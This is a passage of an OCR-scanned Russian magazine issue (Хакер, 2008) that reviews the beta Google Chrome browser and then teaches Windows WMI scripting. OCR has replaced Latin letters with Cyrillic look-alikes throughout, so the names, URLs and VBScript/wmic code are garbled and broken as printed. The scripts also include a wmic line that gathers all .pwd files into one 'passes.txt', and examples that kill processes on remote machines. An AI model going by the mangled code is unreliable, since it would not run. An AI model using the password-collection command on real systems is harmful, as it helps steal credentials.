внешние ссылки будут открываться в новых окнах брау- 
зера, а это разрушает концепцию веб-приложения. СМаіІ 

и Соодіе Реабег превращаются в действительно полно- 
ценные приложения, а вотс Соодіе Оосз номер не пройдет 

— ведьтам каждый документ открывается в новом окне, что 
заставляет переходить в привычный нам браузер. Однако 
тенденция налицо: у всех конкурентов на рынке есть подоб- 
ные механизмы. Например, у Могі 11а есть дочерний проект, 
Ргізт, который также может интегрироваться с браузером, 
а другой игрок, АбоЬе, так, вообще, подошла основательно, 
выпустив целую платформу для веб-приложений — АбоЬе 
АІР (правда, своего браузера у них еще нет). 

^ ОБИДНЫЕ НЕДОСТАТКИ 

Минусы есть, несмотря на то, что за браузером стоит могу- 
чий и идеальный Соодіе. Первое, с чем может столкнуться 
активный веб-серфер — иногда бывают сложности с 
отображением Ріазб-элементов. Отэтой беды не спасает 
даже близость к разработчикам — многие пользователи 
жаловались на падения браузера при заходе на ѴоиТиЬе, 
который, как известно, принадлежит Соодіе. Так как для 
Ріазб-а используется плагин отАбобе, с которым работают 
все браузеры, то можно предположить, что проблема имен- 
но в части интеграции, а не в самом плеере. 

Очень обидно, что браузер совершенно не воспринимает 
формат П55. Странно — и это на фонетого, чтоу Соодіе есть 
оченьдаже неплохой веб П55-ридер, который вполне мож- 
но было интегрировать в браузер! Точнотакиеже претензии 
к е-таіі ссылкам: они, к сожалению, не работают. Сущест- 
вуют проблемы и в работе с 556 — пока браузер не научат 
работать с клиентскими сертификатами, тебе будет закрыта 
дорога на ресурсы, требующие для работы такой авториза- 
ции (например, ѴѴеЬМопеу Ыіе]. 

Из других недостатков можно отметить, что, несмотря 
на всю современность архитектуры браузера и мощь 
инженерного отдела Соодіе, браузер иногда некоррек- 
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Инструкцию по 
сборке Соодіе 
Сбготе под Ыпих 
и Масты найдешь 
на сайте: бІІрѴ/сІеѵ. 
сбготіит.огд/Ноте 




> ІП^О 

На сайте Соодіе вер- 
сии Сбготедля Ыпих 
и Мае 05 еще нет, од- 
нако неофициальные 
сборки, скомпили- 
рованные с исполь- 
зованием ѵѵіпеііб, 
предлагаются всем 
желающим на сайте 
ѵѵѵѵѵѵ.сосіеѵѵеаѵегз. 
сот/зегѵісез/рогіз/ 
сбготіит . 




На диске выложена 
РогІаЫе-версия 
Соодіе Сбготе, 
которую ты можешь 
запускать с любого 
носителя. 
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тно отображает страницы, а бывает, вообще зависает — причем, не 
только текущая вкладка, но весь. Буквально в день написания статьи 
на соседнем компьютере, с М5 Ѵізіа 5Р1 , при заходе на один ресурс 
СЬготе вызвал не просто падение, а мгновенную перезагрузку. Но 
такое случается редко, так что можно сделать скидку на бета-версию. 
С Р Іа з Ь- контентом сложности возникают намного чаще. Также стоит 
отметить слабую поддержку проверки орфографии — пусть это новая 
функциональность, но все уже привыкли к мощи встроенной провер- 
ки правописания в Рі гебох. У Сбготе подобного, увы, не наблюдается. 

Н ВЗГЛЯД ВЕБ-РАЗРАБОТЧИКА 

С точки зрения веб- раз работника, новый браузер оставляет дво- 
якие впечатления. Судите сами. Из хорошего — основой проекта 
является движок ѴѴеЬКК, который используется во многих проек- 
тах, в частности, в АбоЬе АІ Р и Ар р Іе Баіагі. Если ты оптимизировал 
свой сайт под эти браузеры, то особых проблем не будет и с новым. 

■ Хотя некоторые пользователи отмечают нарушение верстки. Види- 
мо, патчи к движку служат не только для интеграции, но и меняют 
способ отображения страниц. Радует, что выбран современный и 
быстрый движок, а значит, большинство существующих веб-стан- 
дартов поддерживаются в полной мере, на пример — АСЮ 2на 100 
баллов, АСЮ 3 на 76 из 100. Да и по скорости работы ѴѴеЬКД — до- 
статочно быстрый, хотя, ввидутесной поддержки Могіііа, странно, 
почему не выбрали их движок (Сеско), который также поддержива- 
ет все стандарты. 

А вот для работы с ^ѵаЗсгірІ используется совсем другой движок: Ѵ8, 
который, по рядутестов, обещает прирост производительности в не- 




сколько раз (хотя параллельныетесты показывают не столь однозначную 
картину). Для нас важны те нюансы нового движка, что обещают прирост 
скорости работы сложных веб-приложений, интенсивно использующих 
АЗАХ. Пока не вышел Рі гебох 3. 1 с его движком ТгасеМопкеу, для работы с 
веб-приложениями С Его те — действительно, самый быстрый браузер. 
Разработчики явно нацелили браузер на продвинутую часть аудитории 
— ведь наряду с существенными ограничениями для конечного поль- 
зователя, описанными выше, в браузере реализованы весьма мощные 
средства разработки. 

Первым в глаза бросается редактор для просмотра исходного кода стра- 
ниц — в нем есть подсветка синтаксиса НТМИ, что делает код страницы 
гораздо читабельнее. Однако, этим дело и закончилось, ожидаемой 



Известные ии 

• Энтузиасты создали переносимую версию РоіТаЫе СЪготе, 
работающую прямо с носителя и обеспечивающую быстрый и 
безопасный веб-серфинг. Кроме этого, она основана на последней 
версии кода — более свежей, чем в публичном релизе и в два раза 
меньшей по размеру, так что поместится на любую флешку. Эту 
версию ты найдешь на нашем ЭѴЭ-диске. 

• Проблема плагинов еще не решена, но разработчики обещают 
добавить их поддержку в скором будущем. Ведь в проекте исполь- 
зован тот же самый АРІ для системы плагинов, что и в других бра- 
узерах. А пока начинают выходить первые программы, облегчаю- 
щие жизнь тем, кто решил постоянно использовать СЬготе. Соо^іе 
СЬготе РгоШе Васкир ( Ъар: //ѵ\ллл/ѵ.рагЬе1іа-іооІ5.сопг) позволяет 
одним кликом мыши создавать и управлять профилями пользо- 
вателей, делать резервные копии данных и синхронизировать их, 
если ты пользуешься браузером на нескольких машинах. Размером 
всего 400 Кб, прога отлично дополняет браузер, и в дальнейшем 
такой функционал может быть встроен в базовый дистрибутив. 

• Для самых нетерпеливых уже есть инструкции ( Ънр : / /4сЬготе . 
ги^ООВ/ОР/ЬапбтасЫ по созданию собственных тем офор- 
мления. Но пока это будет несколько сложнее, чем для Рігебох. 
Кстати, про огненную лису: если немного похачить плагин ІЕѴіеѵу 
позволяющий использовать движок Іпіегпеі: Ехріогег для откры- 
тия страниц в отдельных вкладках, то к нему можно прикрутить 

и Соо^іе СЬготе. Даже не надо ничего делать вручную — все уже 
реализовано в ІЕ Ѵіеѵѵ Ьпе ( р 5://а^ 

йгеіЪх/аскіоп/1429) . 
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Производитель- 

ность 

Компания Соо^іе разработала специальные тесты Огттр : / /сосіе . 
^оо^Іе.сот/р/ѵв/сіоѵѵпІоасіз/ІізО , позволяющие оценить произ- 
водительность іаѵаЗсгірі; в различных браузерах. Самостоятельно 
сравнить свой браузер с СЬготе можно по адресу: Ытр:/ /сосіе. 

^оо^1е.сот/арІ5/ѵ8/гип.1іі:т1 . В таблице приведены результаты 
пяти тестов, в каждом из которых проверялся специализирован- 
ный набор скриптов. 

Хотя тесты написаны, в основном, специалистами самой Соо^іе, 
— доступны исходники. Похоже, нам показывают реальную кар- 
тину. Судя по результатам, ни один из существующих браузеров не 
может и близко сравниться с Соо^іе СЬготе по скорости обработ- 
ки ЭаѵаЗсгірЦ 



подсветки для ^ѵаЭсгірі в редакторе нет. Удивительно, учитывая, что 
редко какая страница обходится без скриптов. 

Отладчик ^ѵаБсгірі, вообще, очень специфический. С одной стороны, 
в нем реализованы все функции дебаггера — работа сточками останова, 
просмотр кода, трассировка и исполнение кода. С другой, — все это реа- 
лизовано в виде интерфейса командной строки и будет радовать взгляд 
разве что любителей работать в консоли. Так что, хоть этот инструмент и 
носит гордое название отладчика, для полноценной работы с веб-при- 
ложениями его рекомендовать сложно. Скорее, перед нами заявка на 
будущий инструментарий; пока же для серьезной работы болееуспешно 
подойдут Рігеіох + РігеЬид-плагин, а СЬготе придется использовать для 
серфинга и проверки совместимости верстки. 

Консоль ^ѵаЭсгірі, напротив, — гораздо шире своего названия. Она уже 
намного ближе кфункциональности РігеЬид-а, но в реальной работе все 
равно нето. Консоль разделена на две функциональные части. Еіетепіз 
показывает всю БОМ-модельтекущей страницы, все стили и позволяет 
редактировать любой элемент страницы, сразу просматривая результат. 
Вкладка Везоигсез показывает в графическом виде диаграмму загрузки 
всех элементов страницы (либо просто список всех составных частей 
— рисунки, подключаемые стили и скрипты]. Это позволитопределить, 
на что тратится больше всего времени при загрузке страницы и что 
нужно оптимизировать. 

Если честно, присутствие этих инструментов в браузере на текущий 
момент совершенно не оправдано, и реальной пользы они не принесут, 




РТ 



ранички 



Разработчиками предусмотрено несколько служебных страниц. 

На них отображается информация о памяти, используемая каждой 

вкладкой, сетевой активности, кэше, записях БИЗ и т.п.: 

аЬоиІ:тетогу — информация об используемой памяти . 

аЬоиІ:5ІаІз — полная статистика браузера. 

а Ь о и I : п еіѵѵо г к — встроенная тулза для мониторинга Сети . 

аЬоиІ:іпІегпеІ5 — как бы за это Місгозоіт не подали в суд : ) . 

аЬоиІіЬізІодгатз — гистограммы для разработчиков . 

аЬоиЫпз — кэшсВЫЗ-записями. 

аЬоиІюасЬе — кэш браузера. 

аЬоиІірІидіпз — информация о плагинах СЬготе. 

аЬоиІ:ѵегзіоп — справка о версии браузера. 

аЬоиІ:сгазИ — для желающих посмотреть надпись « Опаньки !>>:). 



хотя потенциал в нихзаложен богатый. Для серьезного применения в 
веб-разработке следует подождать реализации полноценной под- 
держки плагинов и переноса в новый браузеруже зарекомендовавших 
себя инструментов — ЕігеЬид, ѴЭІоѵѵ или Лйу. 

г ВЗГЛЯД ХАКЕРА: ВНУТРЕННЯЯ АРХИТЕКТУРА 

Браузер имеет полностью открытый и доступный исходный код, который 
пригодится тебе для сборки поддругие платформы илиже для экспе- 
риментов. Проект называется СЬготіит и размещен на отдельном 
веб-сайте. Он интересен и сточки зрения исследователя — внутренняя 
архитектура браузера больше похожа на операционную систему, чем на 
обычную прикладную программу. Инженеры Ооодіе признаются, что, 
постоянно пользуясь браузерами, подметили множество недостатков и 
подумали, что, если в ОС есть возможность сделать защиту от падения 
отдельных программ, что мешает сделать то же самое в браузере? Поэ- 
тому внутри СЬготе все поддерживает многопоточность и многопроцес- 
сность. Каждая вкладка — это отдельный процесс, который исполь- 
зуетсобственные экземпляры всех компонент. Отдельные вкладки никак 
не зависят друг от друга. Тоже самое и отдельные окна браузера — они 
полностью независимы, включая даже движок рендеринга страниц. 
Правда, есть нюанс. Страницы с одного и того же домена открываются 
внутри одного процесса, пусть и в разных вкладках, поэтому падение 
вкладки приведет кзакрытию всех открытых страниц с этого сайта. 

Из чего же состоит браузер СЬготе? Рассмотрим в деталях. 

ѴѴеЬКіІ — известный движокдля рендеринга Ьіт [-страниц. Он исполь- 
зуется, какоснова, и дополнен некоторыми собственными компонен- 
тами. Так как архитектура браузера отличается оттипичной, разработ- 
чикам пришлось написать собственный многопоточный компонент для 
загрузки отдельных частей страницы. Также добавлены изменения, 
отвечающиеза интеграцию с ^ѵаЭсгірі-движком и обеспечивающие 
работу в многопоточном режиме — чтобы каждый процесс, отображаю- 
щий свою страницу, использовал свою версию движка. Процесс исполь- 
зует несколько потоков. Для обмена между ними данными применяется 
специальный механизм коммуникации, который выступаетсвоеобраз- 
ным клеем (діие — так и названа директория в дереве исходных кодов] 
между компонентами. 

Ѵ8 — новая виртуальная машина для исполнения Э аѵаЗсгі рі: . Во мно- 
гих тестах она показывает самую высокую производительность. ВМ 
Ѵ8 создана с нуля и разрабатывается уже на протяжении нескольких 
лет. Мы наблюдаем первый выход движка на большую сцену. Его 
отличие от других втом, что он сразу преобразует код ЭаѵаЗсгі рі: в 
код платформы, на которой исполняется (видимо, в ассемблер), а 
потом кеширует его. Получается гораздо быстрее обычного процес- 
са. Кроме того, оптимизированы самые частые конструкции языка, 
например, обращение к членам класса, особенно в длинной цепочке 
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иаграмма загрузки компонентов веб-страницы 




> ѵѵагпіпд 

Ооодіе СЬготе пока 
находится в стадии 
бета-тестирования 
— пусть открытого, но 
багов не избежать. 
Уже сейчас из-за 
уязвимости в движке 
ѴѴеЬКіІ реально 
заставить браузер 
закачивать файл 
без спроса пользо- 
вателя. Проверить 
уязвимость можно по 
адресу: бирУ/гаРоп. 
пеі/гезеагсб/доодіе/ 
сбготе/сагреГбітГ 
При проверке тебе 
будетзакачан безо- 
бидный блокнот. 



объектов. Это характерно для некоторых библиотек; так, 
]0иегу теперь может производиться намного быстрее, 
буквально одной инструкцией. Разработчики решили и 
извечную проблему с памятью, которую очень «любили» 
сложные А^Х-приложения — встроенный механизм 
сборки мусора не дает скрипту использовать больше 
памяти, чем ему необходимо. Сам движок распространя- 
ется как отдельный проект [ Ыір://собе.доодІе.сот/р/ѵ8 ]. 
и ты можешь собрать его для использования в сторонних 
приложениях. 

5сіа — малоизвестная графическая библиотека, которая 
используется для рисования интерфейса и отображения 
графики. Также работаетна платформе Апбгоіб. Означает, 
что браузер вполне может стать штатным для будущей 
мобильной платформы. 

Зоодіе Зеагз — плагин для браузеров, обеспечивающий 
дополнительные АРІ и расширяющий функциональность 
веб-приложений. К примеру, — встроенную базу да иных с 
полнотекстовым поиском, модульдля реализации оффлайн 
режима и расширение ЭаѵаЗсгі рі:. Модуль встроен прямо 
в браузер. Не надо ничего дополнительно загружать, как 
было раньше. Кстати, веб-приложения с иконками на 
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Всего несколько движений мышью — и веб- 
приложение на твоем рабочем столе! 



рабочем столе и в меню «Пуск» реализованы 
именно через Оеагз. Каждый, кто пользуется 
браузером, теперь сможет испытать преиму- 
щества этого плагина (поддержка Оеагз есть в 
блог-движке ѴѴогбргезз, а самое известное его 
использование — социальная сеть МуЭрасе). 
Специально для исследователей, Реіегіз 
Кгитіп в своем блоге описал 25 используемых 
в проекте открытых библиотек и компонентов, 
что может послужить хорошим аргументом для 
сторонников открытого ПО — в Ооодіе не стали изобретать 
велосипед и использовали проверенные открытые реше- 
ния, дополняя их собственными разработками. 



Н НЕОДНОЗНАЧНЫЕ ВЫВОДЫ 

Простой в использовании и очень быстрый Об готе 
понравится конечным пользователям. Если ты каждый 
день используешь веб-приложения отОоодІе, этотбраузер 
станет верным другом и помощником в Сети. 
Инновационная архитектура и новый движок Эаѵа5сгі рі: 
придутся по душе разработчикам. Но неясно назначе- 
ние некоторых встроенных инструментов — вроде бы 
веб-разработчику они нужны и полезны, но в реальности 
пользоваться ими просто невозможно. Отсутствие системы 
плагинов не позволяет раскрыть потенциал сообщества. Но 
думаю, в будущем это исправят. 

Говорить, что мир завоеван, и война браузеров окончена, 
еще рано. Появление Сбготе активизировало конкурен- 
тов. Скоро выйдет Рігебох 3. 1 и, возможно, детище Гугл уже 
не будет самым быстрым браузером планеты. Движокв 
Могіііа, говорят, имеет гораздо больше потенциала роста в 
плане производительности. ПЕ 
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УЧИМСЯ ТВОРИТЬ ЧУДЕСА С ПОМОЩЬЮ СТАНДАРТНЫХ ИНСТРУМЕНТОВ ЖШ00Ж5 




К 



Если во время диалога с админом ты раз десять услышишь про какой-то 
непонятный ѴѴМІ, удивляться не стоит. Инструмент потрясающий. Искать 
в локалке расшаренные ресурсы, работать с процессами, управлять уста- 
новленными приложениями и драйверами — лишь малая часть того, на что 
способен ѴѴіпсіоѵѵз Мапа^етепі: ІЩегбасе. 



Итак, что та кое ѴѴМІ? ѴѴіпсІоѵѵз Мападетапі ІігЬегРасе — это специально 
разработанный интерфейс для доступа к всевозможным элементам 
системы и выполнения самых разныхадминистративных задач. Умея 
использовать это штатное средство Винды, можнотворить самые на- 
стоящие чудеса, для которых готовой утилиты зачастую просто не найти. 
Удивительно, что многие обходят ѴѴМІ стороной. Но объяснить это можно 
только одним: они просто не видели его в действии! 

Н ОСНОВЫ ѴѴМІ 

Существует два варианта использования ѴѴМІ. Во-первых, можно 
использовать консоль ѴѴМІ (ѵѵтіс.ехе), что иногда довольноудобно, но 
все-таки чаще ксистеме обращаются с помощью собственных сценари- 
ев, написанных на одном из скриптовых языков. Идея в том, что в таких 
скриптах можнозапрограммировать самые разнообразные действия и 
легко автоматизировать часть рутинной работы. 



Запусктаких сценариев осуществляется с помощью встроенной в 
ѴѴіпбоѵѵз компоненты — ѴѴ5Н (ѴѴіпбоѵѵзЗсгірбпд Нов!], которая поумол- 
чанию дружит только с ЗЗсгірІ: и ѴВЗсгірІ, но при установке специальных 
дополнений находитобщий языкстем же самым Регі. ѴѴ5Н нетолько ин- 
терпретируетскрипты, но еще и предоставляет им доступ к так называе- 
мым СОМ -серверам, что очень важно, поскольку именно с их помощью 
можно получить доступ к разым частям системы: запущенным сервисам, 
процессам, реестру, файлам и расшаренным ресурсам (ит.д. ит.п.) 

Для понимания работы необходимо представлять себе структуру ѴѴМІ, 
которая состоит из нескольких элементов. 

Наиболее интересны для нас: 

1. ѴѴМІ- провайдеры, которые фактически являются теми самыми СОМ- 
серверами и, какмыуже выяснили, предоставляют доступ кразличным 
частям системы. 

2. Менеджер объектов СІМ (Соттоп Іпіюгтабоп Мо<М0Ь]ес{ Мападег, 
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Просматриваем все работающие в данный момент сервисы с 
подробным описанием и приложения, установленные на удаленной 
машине 



СІ МОМ), который отвечаетза обработкузапросов конечных приложений 
(сценариев] кѴѴМІ и доставку данных отѴѴМІ обратно приложениям. 

3. И последнее — встроенный репозиторий, который хранитв себе 
классы и объекты. Давай разберемся, что за классы и что за объекты. 
Представь, что вся операционная система — это фигура, собранная из 
разных кубиков. Так вот, каждый кубик — это будет класс. Образно гово- 
ря: есть класс «реестр», класс «файловая система», класс «запущенные 
процессы», класс «беспроводной адаптер» и т.д. Обращаясь к ним, мож- 
но, во-первых, получить какую-то информацию и статистику, а, во-вто- 
рых, воздействовать на них. Но для того чтобы обратиться к конкретному 
кубику, необходим своего рода посредник — объект соответствующего 
класса. Лишь создав объект и используя его свойства и методы, мы 
можем выполнять действия с нужным кубиком. Система такая. 

Понятно, что подобных классов в системе очень много; еще больше 
— свойств и методов, которыми они обладают. А любой из классов, 
как правило, наследуется от какого-то более общего. Короче говоря, 
чехарда еще та. Чтобы привести все в порядок, иерархии классов 
немного разгруппировали и распихали в так называемые п ростра нс- 
тва имен. По умолчанию их четыре: СІМѴ2, ѴѴМІ, ВеіаиІІ, и Зесигііу. 

Мы с тобой познакомимся с первыми двумя, поскольку именно в них 
содержатся наиболее практичные и интересные для нас классы. 
Приступим? 

Н ПЕРВЫЙ СКРИПТ 

Приводить примеры типа «Неііо, ѵѵогісі» в нашем случае просто 
неуместно. Это неурокскриптовыхязыков — мы учимся использовать 
механизм ѴѴМІ. Поэтому с места в карьер мы выберем один из классов 
и попробуем с его помощью получить важную для нас информацию. 

Я не мог отказать себе в удовольствии взять что-нибудь из тематики 
беспроводных сетей. Поэтому в качестве примера мы возьмем класс 
М5 і\ЮІ5_8021 1_В55іі_ібі, входящий в пространство имен ѴѴМІ. С его 
помощью проще простого получить список всех доступных ѴѴі-Рі сетей. 
Делается это примернотак: 

ПРИМЕР НА ѴВ5СШРТ (.ѴВ5) 

оп еггог гезшпе пехк 

зек окф ЗѴ/ЪетЗегѵісез = СекОкф еск ( "міптдткз : \\ . \гоок\ 

ѵлпі " ) 

зек соііпзкапсез = оЪ] ЗШетЗегѵісез . ЕхесОиегу ( " ЗЕЬЕСТ * 

ЕКОМ МЗШіз_80211_ВЗЗІЪІ8к" ) 

ког еаск окд іп соііпзкапсез 
ік Іекк (окд . ІпзкапсеЫате , 4) о "ШШ " апсі гідкк (окд . 

ІпзкапсеМате , 8) о "Міпірогк" ккеп 
ког еасЪ. гамзз ісі іп окд . Шіз8021ІВЗЗІЬізк ззісі = " " 
мерк = гамззіс1.]>кііз8021ІРгіѵасу 




СІ Мѵ2 и ѴѴМІ содержат наиболее интересные для нас классы 

шас = Доіп (гамззіс!.Ес1із8021ІМасАсі(ігезз , ) 

ког і=0 ко иЪоипсІ (гамззіс!.ІІсііз8021133іс1) 
сіесѵаі = гаѵ^ззісі.Шіз802113зісі ( і) 
ік (сіесѵаі >31 АКБ сіесѵаі <127) кііеп 
ззісі = ззісі & Скг (сіесѵаі ) 
епсі ік 
пехк 

мзсгірк . ескю ззісі + " " + мерк + " " + шас 
пехк 
епсі ік 

Далее сохраняем все это в файликѵѵіікѵЬз и запускаем следующим обра- 
зом из командной строки: 

сзсгірк.ехе мікі.ѵЪз 

На экранетутже появится список всех доступных сетей суказанием 55Ю 
и МАС-адреса устройств. Круто? Дальше — лучше. Хочешьузнатьуро- 
вень приема? Или, возможно, скорость передачи данных по беспровод- 
ному подключению? Тебе нужно просто автоматизировать подключение 
к сети? Нет проблем, следующие классы в твоем распоряжении: 

МЗШі з_8 0 2 1 1_Тгапзшік РомегЬеѵеІ 
МЗШіз_80211_Кесеіѵес13ідпа13кгепдк]і 
МЗШі з_8 021 1_РомегМос1е 
МЗШіз_80211_БакаКакез 

Но что с ними делать? «Откуда вообще взялся этот непонятный код», 

— вполне резонно спросишьты. Действительно, беззнания скриптового 
языка сходу написатьсценарией нетаклегко, да и попробуй запомни, 
какиеуэтих классов естьсвойства и методы. Нозадача в разыупроща- 
ется, благодаря существованию специальных программ-помощников: 

• ѴѴМІ Сосіе Сгеаіог. Утилита позволяет генерировать сценарии ѴВЭсгірТ С#, 
ѴВ .ІЧЕТсиспользованиемѴѴМІ.Тебетакжепредоставляется возможность 
интерпретировать написанное и радоваться полученным результатам. 

• БсгірІоМаІіс. Просматриваетвесь набор ѴѴМІ-классов и генерирует при- 
меры скриптов. Оченьудобно использоватьсгенеренные сценарии для 
автоматизации какой-либо работы или системного администрирования. 
Не надо ломать голову и вспоминать «а что же нужно сделать, чтобы 
вывести инфу?» . Достаточно знать, к какому пространству имен 
обратиться, какой из него класс вызвать и какие он содержит записи. 
Запускаем ѴѴМІ Собе Сгеаіог, открываем вкладку Оиегу іогбаіа ітот 

а ѴѴМІ сіазв, далее указываем пространство имен гооДѴѴМІ (при- 
ставка \гооі обязательна) и в списке Сіаззев выбираем уже знако- 
мый М5 і\ЮІ 5_8021 1 _В55І Ызк. В списке свойств тутже появляются 



ХАКЕР 10 /118/ 08 



► 031 





Пример запроса всех полей об установленном программном обеспечении с удален- 
ной машины 



ппі шштгзн 

Щ доступные значения, в том числе список базовых станций жпіс /посіе : ЗЕКѴЕКІ команда 



,ля корректной работы вызова ѴѴіп32_РгосІ исі; с удаленной 
машины требуется установленный компонентѴѴМІ ѴѴіпбоѵѵз 
Іпзіаііег Ргоѵібег Г — 




> ІП^О 

Отличная доку- 
ментация по ѴѴМІ 
на русском: 
ѵѵѵѵѵѵ.всгірі-собіпд. 
іпГо/ѴѴМШтІ 
Подробная справка: 
пикг.пеі/геіегепсе/ 
уѵті/іпбех.ЫтІ 



— N сі із802 1 1 В55ИІ5І:. Кликнув по ней, справа получаешь 
готовый код, который практически совпадает стем, что мы 
привели в примере. Хочешь запустить скрипт и проверить 
его работу? Необязательно даже сохранять файл и замо- 
рачиваться с командной строкой, просто нажми на кнопку 
Ехесиіе Собе и смотри результат. 

Две следующие вкладки программы позволяют выпол- 
нить метод (т.е. какое-то действие], а также проследить за 
наступлением какого-то события (скажем, разряда батареи 
ноутбука). Последняя вкладка Вгоѵѵзе Же патезрасез оп Жіз 
сотриіегноситсправочный характер. С ее помощью легко 
можно изучить содержания пространства имен, подыскать 
подходящий класс. Для свойства Ыбіз8021 1 В55ІІ_із1: про- 
граммы выдает следующее описание: «Списоквсех В55Ю в 
диапазоне и ихсвойства». Каквидишь, более чем доходчиво! 
Обе программы доступны для закачки с сайта Місгозоіф од- 
нако, в любой момент можно воспользоваться шпаргалкой, 
встроенной в ѴѴіпбоѵѵз поумолчанию. Для этого через меню 
« Пуск» за пусти ѵѵЬетЖзІ; и выполни действия: подключить 
(соппесі:)-^ задать нужное пространство имен (например, 
гооАСІМѴ2) -> перечислить классы (епит сіаззез] рекур- 
сивно -> ОК. 

В заключение первого из скриптов возможно разрабаты- 
вать нетолько консольные приложение, но и программы 
с О (Л- интерфейсом. Для запуска такого приложения ис- 
пользуется уже не сзсгірЕехе, а ѵѵзсгірЕехе (для программ, 
имеющих графический интерфейс]. 

Н РАБОТАЕМ С КОНСОЛЬНЫМ РЕЖИМОМ 

Наборы интерфейсов ѴѴМІ доступны в штатной поставке 
для всей линейки ѴѴіпбоѵѵз, за исключением ѴѴіпбоѵѵз 95 и 
ѴѴіпбоѵѵз 98. Для нихтребуется отдельно скачать аддон на 
официальном сайте МісгозоЖ Отметим, что при плотной 
работе с ѴѴМІ иногда используется также консольный 
режим. По сути, это просто консоль, предоставляющая 
возможность доступа к классам ѴѴМІ. Утилита ѵѵтіс.ехе 
доступна на ѴѴіпбо\л/з5егѵег2003 и ѴѴіпбоѵѵзХР РгоЖззіопаІ, 
в случае других системах ее опять же требуется устанавли- 
вать отдельно. 

Еслиутебя по каким-то причинам нет доступа кграфичес- 
ким при ба м басам, скажем, ты работаешь, подключившись 
кудаленной системе через збеіі, то ѵѵтіс.ехе будет крайне 
полезной. Общий синтаксисдля выполнения команды 
следующий: 



Ключ/побе:5ЕРѴЕР1 , естественно, присутствует здесь 
неслучайно. Большинство действий посредством ѴѴМІ 
возможно выполнять нетолько на локальной, но и на любой 
другой удаленной системе (необходимые для этого условия 
обозначены во врезке)! Мы к этому еще вернемся, а сейчас я 
приведу несколько полезных примеров для работы с файло- 
вой системой из КОНСОЛИ: 

УДАЛЕНИЕ БОЛЬШИХ ФАЙЛОВ С РАСШИРЕНИЕМ .І_00: 

ѵѵтіс сІаСаІіІе ѵДіеге "<ігіѵе= , е: 1 апсі 
ЕхСепзіоп= 1 . Іод 1 апсі Еі1еЗІ2е>' 10000000' " 
саіі сІеІеСе 

КОПИРОВАНИЕ ВСЕХ 
.РѴѴБ-ФАЙЛОВ В ЕДИНЫЙ .ТХТ-ФАЙЛ 

ѵѵтіс сІаСаІіІе ѵДіеге "<±гіѵе='е:' апсі раСЬ= ' \ \ 
СезС\\' апсі ЕхСепзіоп= ' .рѵ\гсР " саіі сору "е:\ 
раззез . СхР " 

ПОИСКФАЙЛОВ ПО МАСКЕ 

ѵ\7тіс сіараіііе ѵЩіеге " <ігіѵе= ' е : ' апсі раРІі= ' \ \ 
РезР\\' апсі Іііепаше Ііке ' %СеогдеВиз1і% ' апсі 
ЕхРепзіоп= ' сгР ' " ІізР 

Внимательный читатель, наверняка, обратил внимание, что 
в этих примерах нигде явно не указывается, какой класс и 
какие его методы и свойства вызываются. Все правильно: 
программа ѴѴМІ С основана на псевдонимах и позволяет 
использовать более простой и удобный для командной 
стороки синтаксис. Вывести списокдоступных псевдонимов 
можно, использовав параметр справки «ѴѴМ I С /?». 

В РЕАЛЬНЫЕ ПРИМЕРЫ 

Вернемся, однако, к непосредственно скриптам. Как-то 
вечером, сидя на кухнеу ІогЬ’а, мы с догГом обсуждали, как 
наиболее элегантно получить список всехустановленных 
на машине программ схудо-бедным их описаловом. В ходе 
дискуссии все сошлись на том, что сделать это лучше всего 
какраз через ѴѴМІ. Через пару минут родился следующий 
сценарий: 

Оп Еггог Кезшпе ЫехР 
зРгСотриРег = " . " 



► 032 



ХАКЕР 10 /118/ 08 








^ рс_гопе 




Данная вкладка позволяетустановить безопасность на выбранное про- 
странство, которое, соответственно, содержит разные классы 



# подключаем пространство сітѵ2 (для Міп32_Ргос1исЦ ) 

ЗеЕ оЬзѴШІЗегѵісе = СеЕОЪзесЕ ( "ѵ\АптдтЕз : \\ " & 
зЕгСотриЕег & " \гооЕ\сітѵ2 " ) 

ЗеЕ соІІЕетз = оЬзІШІЗегѵісе . ЕхесОиегу ( " ЗеІесЕ * Егот 
Мп32_Ргос1исЕ) 

Рог ЕасЪ. оЬ;]ІЕет іп соІІЕетз 

ЭДзсгірЕ . ЕсЕю "Название: " & оЬд ІЕет. СарЕіоп 
МзсгірЕ . ЕсЕю "Описание: " & оЕ);і ІЕет. БезсгірЕіоп 
МзсгірЕ . ЕсЕю "Дата установки" & оЬз ІЕет. ІпзЕаІІБаЕе 
МзсгірЕ.ЕсЕю "Версия: " & оЪдІЕет. Ѵегзіоп 

Другой пример — с помощью сценариев ѴѴМІ и конкретно класса 
ѴѴіп32_Ргосез5 можно запускать или, наоборот, удалять процессы 
как на локальной, так и на удаленной машине. 

Следующий сценарий демонстрирует возможность принудитель- 
ного завершения процессов с использованием метода ТегтіпаіеП 
и класса . Сценарий завершает все процессы поіераб.ехе, если 
таковые имеются: 

Оп Еггог Резите ЫехЕ 

ЗеЕ оЬдЗегѵісе = СеЕОЬд есЕ ( "міптдтЕз : { ітрегзопаЕіопЬеѵе 
1=ітрегзопаЕе} ! \\ . \гооЕ\СІМѴ2 " ) 

ІЕ Егг.ИитЬег о 0 ТЕіеп 

МЗсгірЕ . ЕсЕю Егг.ЫишЬег & " : " & Егг . БезсгірЕіоп 
Е/ЗсгірЕ . ОиіЕ 
ЕпсЗ ІЕ 

Еог ЕасН окдРгос Іп Зегѵісе . ЕхесОиегу ( " ЗЕЬЕСТ * ЕРОМ 
Мп32_Ргосезз ШНЕКЕ Ыаше = 'поЕерасІ. ехе ' " ) 
оЬд Ргос . ТегшіпаЕе 
ЫехЕ 

Точка в строке ѴѴМІ-моникера означаетподключение клокальному 
компьютеру. Заменивточку на нужное имя компьютера, ты можешь 
выполнятьдействия на любом компьютере в локальной сети. 

г СЛАВА СИСТЕМЕ! 

Какты уже могубедиться, сама операционная система включаетмощ- 
ные инструменты для выполнения самых разнообразных действий и 
операций. Теперьты не будешь беспомощным кроликом, оказавшись на 
чужой системе в командной строке. И ужточно не станешь вручную вы- 
гружать из памяти 50 процессов одного приложения, которые одновре- 
менно запустились из-за какого-то глюка. Ведь если недля облегчения 
жизни, то для чего вообще это нужно? :І Т 




Чтобы получить полноценный удаленный доступ к интерфейсу 
ѴѴМІ и пространствам имен этой технологии, требуется соблюде- 
ние ряда условий : 

1 ) Дяя вызова удаленных процедур ѴѴМІ использует модель 
ЭСОМ. В случае если возникает ошибка «БСОМ Ассезз БешесІ», 
то действия будут следующими: меню «Выполнить» -> бсотспЕ^. 
ехе Службы Компонентов (Сотропепі Зегѵісез) -> Компьютеры 
-> Мой компьютер -> Свойства (правая кнопка мыши) -> вкладка 
